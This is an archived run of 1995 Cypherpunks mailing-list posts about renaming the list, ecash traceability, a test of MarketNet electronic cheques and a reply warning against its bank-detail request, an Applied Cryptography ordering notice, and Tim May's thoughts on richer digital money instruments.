Better than a vote (and more effective in western culture, where only 39% of the population votes anyway but just tends to go with the flow) is to propose an alternative, flat out, adopt it for yourself, and whoever prefers it will follow your lead. If nobody likes it, then the cypherpunks are simply here to stay.

> Fortunately, there's an elegant solution: form your own group.
>
> Form your own group, your own mailing list, with a catchy name, something
> like "The Privacy Education Foundation," or "The American Civil Liberties
> Union" (whoops, taken), or "The Society for the Preservation of
> Cyberspatial Liberty."
> Then announce it on our list, and elsewhere. People will vote with their
> feet. If your "meme" is catching, your list will rapidly gain members.
> Maybe this Cypherpunks list will even atrophy away.
>
> Evolution in action. The market in action. A better approach than trying to
> get the name and the charter changed.

My point is that you may not have to do all this. This is a recurring thread on the list. . . if enough people feel the same way you do you could have the human resources effective for a cypherpunks "take-over". As for myself, I don't think I would change. . . I actually _am_ a "long-haired weirdo". I think a slightly more conservatively named organization similar to the cypherpunks would be a good thing, however, simply because I like the idea of having something more low-key to compare c-punks with, sort of like the IRA to Sinn Fein.

I'm just offering some humble advice, knowing full well that I am for the most part an unknown lurker without much reputational weight to throw around. It's also part of a leadership dynamic that is, I feel, underused. (Furthermore, if it works, I could use it as a paper topic for my social psychology class ;). )

Sincerely,
-=Kathleen M. Ellis=-

If you can come, don't forget that the DC Cypherpunks are having a meet on Saturday at 3pm at Digital Express in Beltsville, MD..email me for directions or info on our mailing list.

kelli at zeus.towson.edu          Geek Code v3.0          http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- y+>+(-) PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.     Towson State University     DSOC at zeus.towson.edu

"All the world will be your enemy, Prince With The Thousand Enemies. . . And whenever they catch you, they will kill you. But first, they must catch you. . ."
-Richard Adams

From bugs at ritz.mordor.com Fri Sep 15 07:02:47 1995
From: bugs at ritz.mordor.com (Mark Hittinger)
Date: Fri, 15 Sep 95 07:02:47 PDT
Subject: Oct Byte - Wayner's article heh
Message-ID: <199509151402.KAA10522@ritz.mordor.com>

Check it out

From hfarkas at ims.advantis.com Fri Sep 15 07:35:57 1995
From: hfarkas at ims.advantis.com (Henry W. Farkas)
Date: Fri, 15 Sep 95 07:35:57 PDT
Subject: Why ecash is traceable
In-Reply-To: <199509151220.FAA00243@netcom4.netcom.com>
Message-ID:

On Fri, 15 Sep 1995, Tom Rollins wrote:

> Just a little humor...
> Perhaps Electronic Cash has a sound.
> Phone Phreakers have something called a Redbox.
> This device makes the sound of a quarter.
> When an ATT pay phone asks you to deposit $1.75
> you just make the sound of 7 quarters... :)

New Zen koan? What is the sound of 7 quarters *not* being deposited?

===========================================================================
Henry W. Farkas              | Me? Speak for IBM? Fat chance.
hfarkas at ims.advantis.com  |------------------------------------------------
hfarkas at vnet.ibm.com      | http://newstand.ims.advantis.com/henry
henry at nhcc.com            | http://www.nhcc.com/~henry
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
Public key at: pgp-public-keys at pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack
"We're not fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================

From hfinney at shell.portal.com Fri Sep 15 07:49:44 1995
From: hfinney at shell.portal.com (Hal)
Date: Fri, 15 Sep 95 07:49:44 PDT
Subject: Why ecash is traceable
Message-ID: <199509151448.HAA21190@jobe.shell.portal.com>

Sorry, I don't have time to write much now. The missing piece in my description was the assumption that people would have to send received cash to the bank non-anonymously. However as Tim points out that can be avoided in on line systems, and in that case Alice cannot actually learn Bob's identity. However as was also pointed out the cash can at least be detected and invalidated so technically it is still traceable. The protection of the payor is still not really as strong as that of the payee.

I should also mention that when we discussed this earlier Jason Solinsky suggested that transferrable cash systems also provide a means for Bob to keep his identity secret. The cash is still traceable in that the bank can recognize it when it is finally deposited, but it may have passed through many people's hands in the meantime and their identities are not known.

Hal

From rsalz at osf.org Fri Sep 15 08:13:26 1995
From: rsalz at osf.org (Rich Salz)
Date: Fri, 15 Sep 95 08:13:26 PDT
Subject: Linking = Showing = Transferring?
Message-ID: <9509151512.AA08301@sulphur.osf.org>

> I think this case is safer than the porn one, because the actual data
> in this case is legal in both jurisdictions, it just must not be
> transferred from jurisdiction US -> jurisdiction non-US, which it has
> not been.
I believe you're right, this is the key distinction which I missed. (Disregard my earlier email to you :) Thanks for the patient explanation.

/r$

From mfroomki at law.miami.edu Fri Sep 15 08:15:42 1995
From: mfroomki at law.miami.edu (Michael Froomkin)
Date: Fri, 15 Sep 95 08:15:42 PDT
Subject: DD, pedophiles, and Terrorists, oh my
In-Reply-To: <199509150908.CAA22145@ix3.ix.netcom.com>
Message-ID:

FOIA doesn't work for stuff pertaining to ongoing LEA activity or cases pending in court. (simplified summary of complex rule)

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki at umiami.ir.miami.edu
U. Miami School of Law     |
P.O. Box 248087            | It's hot here. And humid.
Coral Gables, FL 33124 USA |
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki

From JohnHemming at mkn.co.uk Fri Sep 15 08:23:21 1995
From: JohnHemming at mkn.co.uk (John Hemming CEO MarketNet)
Date: Fri, 15 Sep 95 08:23:21 PDT
Subject: More on ECheques
Message-ID:

Version 0.1 (beta) of WorkHorse has now been put on the ftp site together with instructions as to how to use it to pay for things with ECheques.

You are welcome to test ECheques on our live floristry service. To do this:

1. Download WorkHorse ftp://193.119.26.70/mktnet/pub/horse.zip
2. Follow the instructions for generating a key.
   a) Generate Key System/security/key gen (please use 512 bits)
   b) Specify your user details Alter/my details (put in a bank a/c no)
3. Don't worry about registering the key (unless you really want the flowers and have a BankNet account)
4. Try http://alpha.mkn.co.uk/load ordflow
   .. or http://beta.mkn.co.uk/load ordflow
   .. or http://epsilon.mkn.co.uk/load ordflow
5. Don't fill in credit card details. Please put a name of Test or testing. Click the button for ECheque (or electronic cheque)
6. Send the form.

If you can easily trace the conversation it will be interesting. The system will automatically go into SSL with 128 bit RC4.
It will generate a signed instruction and transmit that in the secure session.

If you want to see how the form works save the html source. You can set it up on another server and receive the signed instruction yourself if you want. You can use workhorse to check the signature.

(The first live ECheque was issued on Wednesday).

From clewton at netcom.com Fri Sep 15 08:36:32 1995
From: clewton at netcom.com (Charles Lewton)
Date: Fri, 15 Sep 95 08:36:32 PDT
Subject: Linking = Showing = Transferring?
In-Reply-To:
Message-ID:

On Fri, 15 Sep 1995, Duncan Frissell wrote:

> On Thu, 14 Sep 1995, Lucky Green wrote:
>
> > The answer is trivial. If it pisses of the fascists in power enough, you
> > go to jail or get killed.
>
> As a libertarian nut, I bow to no one in my love of extreme statements.
> But I feel compelled to squash this particular notion whenever I see it.
> Randy Weaver really pissed off the Feds and did not go to jail (except
> during trial) and received a $3.1 million settlement. (.1 to him, 3 to
> the kids but they are minors).
>
> DCF

Not quite squashed, Duncan. Bullet placement (poor by some standards) is all that prevented Mr. Weaver from croaking like his unfortunate wife. She is said to have "pissed off" the feds but was not charged with a single actionable item yet she remains quite dead.

Unless I have missed something somewhere, no TLA is concerned in the slightest with individual liberty. That notion should keep a rational person awake nights.

Chuck

From fair at clock.org Fri Sep 15 09:04:16 1995
From: fair at clock.org (Erik E. Fair (Time Keeper))
Date: Fri, 15 Sep 95 09:04:16 PDT
Subject: NSA on GAK
Message-ID:

At 16:25 9/14/95, Rich Salz wrote:
>>> Internet runs on software distributed over the Internet.
>
>This is more like an aphorism than a true statement.

Um, not really.
I dunno about you, but I don't bother to get new ROMs from cisco for each new software release - I FTP the code over the net, and write it into flash RAM in the routers (or net boot it). So, in fact, there are many sites (and backbones) for which that statement is literally true.

Erik Fair

P.S. And yes, cisco does publish MD5 hashes of their binaries.

From rsalz at osf.org Fri Sep 15 09:23:02 1995
From: rsalz at osf.org (Rich Salz)
Date: Fri, 15 Sep 95 09:23:02 PDT
Subject: NSA on GAK
Message-ID: <9509151622.AA08762@sulphur.osf.org>

Yeah, really. I didn't say it isn't true, I just said it's more like a cute quote than truth. Compare the number of bits downloaded in TCP/IP and routing infrastructure to the number of bits that are purchased at the store or via a P.O. Minuscule.

r$

From tcmay at got.net Fri Sep 15 09:46:17 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 15 Sep 95 09:46:17 PDT
Subject: Why ecash is traceable
Message-ID:

At 8:47 AM 9/15/95, Donald M. Kitchen wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Excellent discussion on the subject, actually. However, your idea of
>the "first person to the bank" maintaining anonymity via remailer block
>is flawed. First of all, if a collusion with the bank is being taken into
>account, presumably sufficient enough resources are involved that someone
>may try and track the reply block. Mixmaster (as your messages mentioned
>by name) would be necessary to eliminate the chance of tracking the block
>through combinations of replay attacks etc. (Which reminds me, has anyone

Just to clarify a minor point, I mentioned "mixes," not Mixmaster. I have nothing against Mixmaster, but "mix" is the term Chaum invented for what we later started to call a "remailer."

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May               | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA               | knowledge, reputations, information markets,
Higher Power: 2^756839       | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From trei at process.com Fri Sep 15 09:57:16 1995
From: trei at process.com (Peter Trei)
Date: Fri, 15 Sep 95 09:57:16 PDT
Subject: More on ECheques
Message-ID: <9509151657.AA12563@toad.com>

> Version 0.1 (beta) of WorkHorse has now been put on the ftp site together
> with instructions as to how to use it to pay for things with ECheques.
>
> You are welcome to test ECheques on our live floristry service. To
> do this:
>
> 1. Download WorkHorse ftp://193.119.26.70/mktnet/pub/horse.zip
> 2. Follow the instructions for generating a key.
> a) Generate Key System/security/key gen (please use 512 bits)
> b) Specify your user details Alter/my details (put in a bank a/c no)
[...]

If a random person called you on the phone, and asked for one of your bank account numbers, would you give it to him/her?

Peter Trei
Senior Software Engineer
Purveyor Development Team
Process Software Corporation
http://www.process.com
trei at process.com

From trei at process.com Fri Sep 15 10:04:38 1995
From: trei at process.com (Peter Trei)
Date: Fri, 15 Sep 95 10:04:38 PDT
Subject: More on ECheques (retry)
Message-ID: <9509151704.AA12852@toad.com>

Gah - it's easy to click on 'send' before you really mean to

> You are welcome to test ECheques on our live floristry service. To
> do this:
>
> 1. Download WorkHorse ftp://193.119.26.70/mktnet/pub/horse.zip
> 2. Follow the instructions for generating a key.
> a) Generate Key System/security/key gen (please use 512 bits)
> b) Specify your user details Alter/my details (put in a bank a/c no)

If you received a phone call from someone you did not know, who asked you for your bank account number, would you comply?
If a stranger handed you a floppy and asked you to run the binary on it. while connected to the Internet, and give it your bank account number, would you do so? If email from an unknown person asked you to download a binary over the internet, and run it, giving it your bank account number, would you do it? That's exactly what is being asked here. Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From dsc at swcp.com Fri Sep 15 10:13:36 1995 From: dsc at swcp.com (Dar Scott) Date: Fri, 15 Sep 95 10:13:36 PDT Subject: Why ecash is traceable Message-ID: Timothy May wrote, >I don't think all systems must be able to deal with double spending. > >For example, the first person to read this number: 45%2)d[12ks&Qmdx and to >then submit it any form--in person, by e-mail, via remailer, etc.--to The >First Bank of Cyberspace will have $10 sent to him or her, as cash or as a >spendable amount of digicash (untraceable to recipient, of course). I would expect that services might emerge that would strengthen this without the bank getting involved and without loss of anonymity. It might emerge that because of the bank's lack of handling of double spending that in some transactions some payees would request a money order from a trustee. The payee might supply the list of money order suppliers allowed for that day. If the payee does not want the money order addressed with a public key, he can supply a set of alternate keys each encrypted for an acceptable trustee. The money order allows the payee to be as sure that the cash is good as he trusts the trustee (and the bank). With or without the use of a remailer this can add to hiding the payer. However, unless the payee provides a hidden key, the trustee does know who received some payment. 
The trustee is highly motivated to operate a memoryless system (except for the trustee's own cash) and might be audited to ensure this to both customers and potential physical raiders. The cash bundled in the money order need not be that returned from exchanging the money order payment. Some trustees might return a money order containing cash that has other properties, too. If the payee really trusts the trustee, then no race to exchange the cash is needed--hiding the payee further. The payee can exchange it over a period of time or as needed. Exchange includes indirect exchange as in buying money orders. I'm new to protocols and I mention details below only to add hopefully clarifying material, not to suggest that I have any idea of the right ways to do these things. These can be implemented using PGP. Money Order: The automated trustee checks the money (for money order amount and fee). If it is bad the trustee sends it back. Otherwise, the trustee exchanges the cash and then selects from cash on hand cash of the amount of the money order. This is encrypted for the payee. (The buyer must supply something the trustee would know how to use to encrypt for the payee: public key or message addressed to the trustee containing information on how to encrypt for the payee.) The money is encrypted with that. A description is added to this and it is signed by the trustee and sent back to the payer. The description may or may not mention the payee depending on whether the money was wraped with a public key or not. Escrowed Money Order: The trustee creates a money order that can be opened by either the payer or payee and encrypts that for the escrow agent. A description and signature is added. Generalization: Payees and escrow agents can be abstract recipients such as and/or lists. I wonder how much I could charge for this. 
Dar =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html =========================================================== From tcmay at got.net Fri Sep 15 10:30:47 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 15 Sep 95 10:30:47 PDT Subject: CYPHERPUNK considered harmful. Message-ID: At 1:58 PM 9/15/95, K. M. Ellis wrote: (quoting my response) >> We fill a certain niche which is useful to have filled, a more radical >> facet of things. If we didn't exist, or renamed ourselves "Concerned >> Citizens for Cryptographic Protection," CCCP, then somebody would have to >> _invent_ the Cypherpunks! >> > >True, but if the majority of active participants see an alternative >agreeable to them, they may just switch and start calling themselves >something else. If the list owner likes it and changes the name of the >list, then what of the cypherpunks unwilling to change? It would appear, >then, that they would be the ones who would have to find somewhere else >to go. Indeed, if a majority of folks on this list start calling themselves "Martians" or "Crypto Tools," then I suppose this list will _gradually_ adopt that name. Though even then there are no guarantees, as this list is run on a machine not controlled by a list democracy. Go for it! If you wish the folks on this list to call themselves "Concerned Citizens for Cryptographic Freedom," then start calling yourself that. What I think would be a waste of everyone's time is a drawn-out series of proposals for new names, a debate which is unlikely in the extreme to result in a new name. 
>Better than a vote (and more effective in western culture, where only 39% >of the population votes anyway but just tends to go with the flow) is to >propose an alternative, flat out, adopt it for yourself, and whoever >prefers it will follow your lead. If nobody likes it, then the >cypherpunks are simply here to stay. Indeed, some people here have been calling themselves by various names ("CypherGeek," "Crypto Rebel," etc.) for a long time. Personally, I despise the terms "geek," "dweeb," and "nerd," and think anyone who calls themselves by these insults is not "reclaiming and deconstructing the labels of the oppressor class," as the slogan goes, but is merely insulting themselves. Blacks who call themselves "niggers," homosexuals who call themselves "queers," and computer programmers who call themselves "geeks" and "dorks" are all playing the same game. >"long-haired wierdo". I think a slightly more conservatively named >organization similar to the cypherpunks would be a good thing, however, >simply because I like the idea of having something more low-key to compare >c-punks with, sort of like the IRA to Sinn Fein. I'm just offering some >humble advice, knowing full well that I am for the most part an unknown >lurker without much reputational weight to throw around. It's also part >of a leadership dynamic that is, I feel, underused. (Furthermore, if it >works, I could use it as a paper topic for my social psychology class ;). ) The problem is not a "leadership dynamic," the problem is that name changes are not easily arranged. With 700 people on this list, many of whom appear to _like_ the name, how long will it take before enough want to change to make it so? And who says democracy is such a good thing? What if 200 want to change, 100 don't, and the rest don't care or don't "vote"? A better approach is for the "conservatives" who want a "more conservative" name to simply do what I suggested: form a new group and name it what they like. 
They wouldn't have to quit this list, they would just be able to cleanly recruit for their new list. Seems simple to me. And honest. And less devisive than trying to change the name of a group with a long history (by modern standards) and with several well-known achievements. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From dat at ebt.com Fri Sep 15 10:39:33 1995 From: dat at ebt.com (David Taffs) Date: Fri, 15 Sep 95 10:39:33 PDT Subject: [revcoal@pcnet.com: Re: The owls are not what they seem] Message-ID: <9509151740.AA06675@veronica.EBT.COM> fyi... Date: Fri, 15 Sep 1995 00:02:33 -0400 (EDT) From: "Donna J. Logan" To: Marilyn159 at aol.com Cc: Search Net Subject: Re: The owls are not what they seem In-Reply-To: <950912141715_17265559 at mail06.mail.aol.com> Mime-Version: 1.0 Sender: snet-l-approval at world.std.com Precedence: bulk Reply-To: snet-l at world.std.com Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Length: 1330 It's your service provider....same thing happened to a whole bunch of us when we used to be on it...and only selective posts to selective lists. Look to the headline's your provider has generated the past few days and you'll get a clue as to what's going on...except the net spread by them and the feds is a lot wider than just kiddie pornographers. 
BTW, I'm being cagey in actually mentioning your service provider's name/ initials, as we found that was one of the "keywords" in the filter program used by them and a certain national police agency (who's initials also trigger the filter program) to flag posts which they thought may be "interesting", resulting in delays of up to days in posting. Same thing happened in live chat in PRIVATE chat rooms, we were able to bring the system to a complete halt by just typing the initials of Frederico's Bumbling Idiots.... The only solution to Amerigo's Obnoxious Lackeys was to cancel our accounts and switch to CHEAPER local service providers, who also happen to provide BETTER service, with no censorship/surveillance. ;-> On Tue, 12 Sep 1995 Marilyn159 at aol.com wrote: > This is so weird... > Only pieces of the message I sent are getting through. This is a little bit > more but not the whole thing. > Where is the rest of it? > Is this censorship or computer error? > From syrinx at c2.org Fri Sep 15 10:57:40 1995 From: syrinx at c2.org (Syrinx Anonymous Remailer) Date: Fri, 15 Sep 95 10:57:40 PDT Subject: No Subject Message-ID: <199509151752.KAA04838@infinity.c2.org> > Meaning: In all cases, if a page is being shown and >it links to another page, then the other page is being >shown. >I wonder if I have a pornopage. Does this mean that if I have a link to Infoseek or another search engine, that I, too, am hosting pornography? Which would be an interesting idea as far as trying to present a "safe" way to search the Internet. A web- crawler or other search mechanism of choice could be started up, and simply refuse to run searches for certain keywords. Ideally (but impractical) any pages dug up that contain the questionable words could be manually checked. 
From schneier at winternet.com Fri Sep 15 11:07:30 1995
From: schneier at winternet.com (Bruce Schneier)
Date: Fri, 15 Sep 95 11:07:30 PDT
Subject: Applied Cryptography, Second Edition: Ordering Information
Message-ID: <199509151807.NAA10561@subzero>

The SECOND EDITION of APPLIED CRYPTOGRAPHY is coming in November. This is a major rewrite: 50% more words, 7 more chapters, and over 1600 references. Not only did I make corrections to the first edition and add developments since it was published, but I also included topics left out of the first edition. (See table of contents--attached.)

The second edition has lots of new algorithms (including GOST, Blowfish, RC4, and A5), more information on the Clipper Chip and key escrow, dozens of new protocols, more information on how PGP works, detailed information on key management and modes of operation, and new source code.

The second edition will be published in paperback and hardcover. Right now I am making both available at a 15% discount.

*****************************************************************
ORDER FORM

Applied Cryptography, 2nd Edition (Hardcover): $70 * .85 = $59.00
Applied Cryptography, 2nd Edition (Softcover): $50 * .85 = $42.00

Shipping:
  Air (U.S.):       $5 per book
  Surface (U.S.):   $3 per book
  Canada/Mexico:    $7 per book
  Everywhere else:  $9 per book

Send to: Counterpane Systems, 101 E Minnehaha Parkway, Minneapolis, MN 55419
*****************************************************************

APPLIED CRYPTOGRAPHY, SECOND EDITION
Table of Contents

((Sections in all capitals are either new or substantially rewritten.))

Foreword by Whitfield Diffie
Preface

Chapter 1: Foundations
Terminology; STEGANOGRAPHY; Substitution Ciphers and Transposition Ciphers; Simple XOR; One-Time Pads; Computer Algorithms; Large Numbers

Part I: Cryptographic Protocols

Chapter 2: Protocol Building Blocks
Introduction to Protocols; Communications using Symmetric Cryptography; One-Way Functions; One-Way Hash Functions; Communications using Public-Key Cryptography; Digital Signatures; Digital Signatures with Encryption; Random and Pseudo-Random Sequence Generation

Chapter 3: Basic Protocols
Key Exchange; Authentication; AUTHENTICATION AND KEY EXCHANGE; FORMAL ANALYSIS OF AUTHENTICATION AND KEY-EXCHANGE PROTOCOLS; Multiple-Key Public-Key Cryptography; Secret Splitting; Secret Sharing; Cryptographic Protection of Databases

Chapter 4: Intermediate Protocols
Timestamping Services; Subliminal Channel; Undeniable Digital Signatures; DESIGNATED CONFIRMER SIGNATURES; PROXY SIGNATURES; Group Signatures; Fail-Stop Digital Signatures; Computing with Encrypted Data; Bit Commitment; Fair Coin Flips; Mental Poker; ONE-WAY ACCUMULATORS; All-or-Nothing Disclosure of Secrets; KEY ESCROW

Chapter 5: Advanced Protocols
ZERO-KNOWLEDGE PROOFS; Zero-Knowledge Proofs of Identity; Blind Signatures; IDENTITY-BASED PUBLIC-KEY CRYPTOGRAPHY; Oblivious Transfer; OBLIVIOUS SIGNATURES; Simultaneous Contract Signing; Digital Certified Mail; Simultaneous Exchange of Secrets

Chapter 6: Esoteric Protocols
SECURE ELECTIONS; Secure Multiparty Computation; Anonymous Message Broadcast; DIGITAL CASH

Part II: Cryptographic Techniques

Chapter 7: Key Length
SYMMETRIC KEY LENGTH; PUBLIC-KEY KEY LENGTH; COMPARING SYMMETRIC AND PUBLIC-KEY KEY LENGTH; BIRTHDAY ATTACKS AGAINST ONE-WAY HASH FUNCTIONS; How Long Should a Key Be?; Caveat Emptor

Chapter 8: Key Management
Generating Keys; NONLINEAR KEYSPACES; Transferring Keys; Verifying Keys; Using Keys; UPDATING KEYS; Storing Keys; Backup Keys; Compromised Keys; Lifetime of Keys; Destroying Keys; Public-Key Key Management

Chapter 9: Algorithm Types and Modes
Electronic Codebook Mode; Block Replay; Cipher Block Chaining Mode; Stream Ciphers; Self-Synchronizing Stream Ciphers; Cipher-Feedback Mode; Synchronous Stream Ciphers; Output-Feedback Mode; Counter Mode; Other Block-Cipher Modes; CHOOSING A CIPHER MODE; INTERLEAVING; Block Ciphers vs. Stream Ciphers

Chapter 10: Using Algorithms
Choosing an Algorithm; Public-Key Cryptography vs. Symmetric Cryptography; Encrypting Communications Channels; ENCRYPTING DATA FOR STORAGE; Hardware Encryption vs. Software Encryption; COMPRESSION, ENCODING, AND ENCRYPTION; DETECTING ENCRYPTION; HIDING CIPHERTEXT IN CIPHERTEXT; DESTROYING INFORMATION

Part III: Cryptographic Algorithms

Chapter 11: Mathematical Background
Information Theory; Complexity Theory; NUMBER THEORY; FACTORING; Prime Number Generation; Discrete Logarithms in a Finite Field

Chapter 12: Data Encryption Standard
Background; Description of DES; Security of DES; DIFFERENTIAL AND LINEAR CRYPTANALYSIS; THE REAL DESIGN CRITERIA; DES VARIANTS; HOW SECURE IS DES TODAY?

Chapter 13: Other Block Algorithms
Lucifer; Madryga; Newdes; Feal-N; Redoc; LOKI; Khufu and Khafre; RC2; Idea; Mmb; CA-1.1; SKIPJACK

Chapter 14: Still Other Block Algorithms
GOST; CAST; BLOWFISH; SAFER K-64; 3-WAY; CRAB; SXAL8/MBAL; RC5; OTHER BLOCK ALGORITHMS; THEORY OF BLOCK CIPHER DESIGN; USING ONE-WAY HASH FUNCTIONS; CHOOSING A BLOCK ALGORITHM

Chapter 15: Combining Block Algorithms
DOUBLE ENCRYPTION; TRIPLE ENCRYPTION; DOUBLING THE BLOCK LENGTH; OTHER MULTIPLE ENCRYPTION SCHEMES; CDMF KEY SHORTENING; WHITENING; CASCADING MULTIPLE BLOCK ALGORITHMS; COMBINING MULTIPLE BLOCK ALGORITHMS

Chapter 16: Pseudo-Random-Sequence Generators and Stream Ciphers
Linear Congruential Generators; Linear Feedback Shift Registers; LFSRs in Software; DESIGN AND ANALYSIS OF STREAM CIPHERS; Stream Ciphers using LFSRs; A5; HUGHES XPD/KPD; NANOTEQ; RAMBUTAN; ADDITIVE GENERATORS; GIFFORD; ALGORITHM M; PKZIP

Chapter 17: Other Stream Ciphers and Real Random-Sequence Generators
RC4; SEAL; WAKE; FEEDBACK WITH CARRY SHIFT REGISTERS; STREAM CIPHERS USING FCSRS; NONLINEAR FEEDBACK SHIFT REGISTERS; Other Stream Ciphers; System-Theoretic Approach to Stream Cipher Design; Complexity-Theoretic Approach to Stream Cipher Design; Other Approaches to Stream Cipher Design; CASCADING MULTIPLE STREAM CIPHERS; CHOOSING A STREAM CIPHER; GENERATING MULTIPLE STREAMS FROM A SINGLE PSEUDO-RANDOM SEQUENCE GENERATOR; REAL RANDOM-SEQUENCE GENERATORS

Chapter 18: One-Way Hash Functions
Background; Snefru; N-HASH; MD4; MD5; MD2; Secure Hash Algorithm (SHA); RIPE-MD; Haval; Other One-Way Hash Functions; ONE-WAY HASH FUNCTIONS USING SYMMETRIC BLOCK ALGORITHMS; Using Public-key Algorithms; CHOOSING A ONE-WAY HASH FUNCTION; MESSAGE AUTHENTICATION CODES

Chapter 19: Public-Key Algorithms
Background; Knapsack Algorithms; RSA; Pohlig-Hellman; Rabin; ElGamal; McEliece; Elliptic Curve Cryptosystems; LUC; FINITE AUTOMATON PUBLIC-KEY CRYPTOSYSTEMS

Chapter 20: Public-Key Digital Signature Algorithms
Digital Signature Algorithm (DSA); DSA VARIANTS; GOST DIGITAL SIGNATURE ALGORITHM; DISCRETE LOGARITHM SIGNATURE SCHEMES; Ong-Schnorr-Shamir; Esign; Cellular Automata; Other Public-Key Algorithms

Chapter 21: Identification Schemes
Feige-Fiat-Shamir; Guillou-Quisquater; Schnorr; CONVERTING IDENTIFICATION SCHEMES TO SIGNATURE SCHEMES

Chapter 22: Key-Exchange Algorithms
DIFFIE-HELLMAN; STATION-TO-STATION PROTOCOL; Shamir's Three-Pass Protocol; COMSET; Encrypted Key Exchange; FORTIFIED KEY NEGOTIATION; Conference Key Distribution and Secret Broadcasting

Chapter 23: Special Algorithms for Protocols
Multiple-Key Public-Key Cryptography; Secret Sharing Algorithms; Subliminal Channel; Undeniable Digital Signatures; DESIGNATED CONFIRMER SIGNATURES; Computing with Encrypted Data; Fair Coin Flips; ONE-WAY ACCUMULATORS; All-or-Nothing Disclosure of Secrets; FAIR AND FAILSAFE CRYPTOSYSTEMS; Zero-Knowledge Proofs of Knowledge; Blind Signatures; Oblivious Transfer; Secure Multiparty Computation; Probabilistic Encryption; Quantum Cryptography

Part IV: The Real World

Chapter 24: Example Implementations
IBM Secret-Key Management Protocol; Mitrenet; ISDN; STU-III; Kerberos; KryptoKnight; SESAME; IBM COMMON CRYPTOGRAPHIC ARCHITECTURE; ISO Authentication Framework; Privacy-Enhanced Mail (PEM); Message Security Protocol; PRETTY GOOD PRIVACY (PGP); SMART CARDS; PUBLIC-KEY CRYPTOGRAPHY STANDARDS; UNIVERSAL ELECTRONIC PAYMENT SYSTEM; CLIPPER; CAPSTONE; AT&T MODEL 3600 TELEPHONE SECURITY DEVICE

Chapter 25: Politics
NATIONAL SECURITY AGENCY; National Computer Security Center; National Institute of Standards and Technology; RSA Data Security, Inc.; PUBLIC KEY PARTNERS; International Association for Cryptologic Research; RACE Integrity Primitives Evaluation; CONDITIONAL ACCESS FOR EUROPE; ISO/IEC 9979; PROFESSIONAL, CIVIL LIBERTIES, AND INDUSTRY GROUPS; Sci.Crypt; CYPHERPUNKS; Patents; U.S. EXPORT RULES; FOREIGN IMPORT AND EXPORT OF CRYPTOGRAPHY; Legal Issues

AFTERWORD BY MATT BLAZE

Source Code
DES; LOKI91; IDEA; GOST; BLOWFISH; 3-WAY; RC5; A5; SEAL; WAKE

References

From tcmay at got.net Fri Sep 15 11:14:05 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 15 Sep 95 11:14:05 PDT
Subject: Crypto + Economics + AI = Digital Money Economies
Message-ID:

Dar Scott proposes some extensions to digital cash to deal with the issues being discussed here. He mentions "money orders" and "escrowed money orders," and he alludes to "trustees," or agents that would behave in certain well-defined ways.

This is as good a place as any to address a point I've been thinking about for a long while, and which I've touched on before. Namely, that the "ontology" of digital money, the instruments and forms it can take, are _impoverished_ compared to the real world.

In my eight years of following digital cash work, I've been struck with how little _economics_ enters the fray. Many of the protocols that seem to have problems from a purely cryptographic point of view seem to get fixed when additional _economic_ considerations are included (the consideration we cite the most is "reputation," and we debate this endlessly). The PGP "web of trust" is a kind of example of this additional consideration, if we make certain fairly reasonable assumptions about the nature of collusion.

(Lots of stuff to get into here, but I want to make some other points and not get too sidetracked.)

"Digital money" currently has only a few ways of dealing with transfers of value in transactions. A lot of the problems come, in my view, from this relatively spartan set of "primitives." Where are the cryptographic equivalents of:

- money orders
- promissory notes
- receipts
- warrants
- lockboxes
- bearer bonds
- options
- time deposits
- coupons
- escrow
- IOUs
- zero coupon bonds
- checks

...and so on. The terms in any good dictionary of financial terms (such as the "MIT Dictionary of Modern Economics," ed. by David Pearce, 1992).

(Many of these things are built up out of more basic things, with mix-ins from other classes, or with modified methods.)

A look at any book on money and finance shows a rich "microworld" of "things" and "procedures" (classes and methods attached to classes). The classes have subclasses, and the methods have various behaviors and "expectations" attached (more than just simple class behavior, more of an AI or agent flavor, in my view).

(AI is somewhat of a dirty word these days, due to hyped expectations. But many of the methods have been useful in limited domains. The domain of financial transactions, with the classes and methods hinted at above, involve a lot of formal manipulations and expected behaviors.)

In the real world, as the "base class" of "things traded" (tangible assets) reached various limits, a new class of "money" was created, where money was gold, silver, spices, etc., that could be more easily transported and stored. And so on, through levels of abstraction (marks on clay tablets, entries in ledger books, issuances of certificates, bonds, derivatives, etc.)

My point is not to recap views of the history of money in its many forms, or even to give my views on the "ontology of money," but to say that many of the problems we think are present in current digital money systems may largely result from the impoverished set of base classes of digital money.

To me, an exciting project is to take the basic cryptographic protocols and build up more structured objects (blobs, envelopes, seals, etc.), and then incorporate these into even more complicated financial instruments.

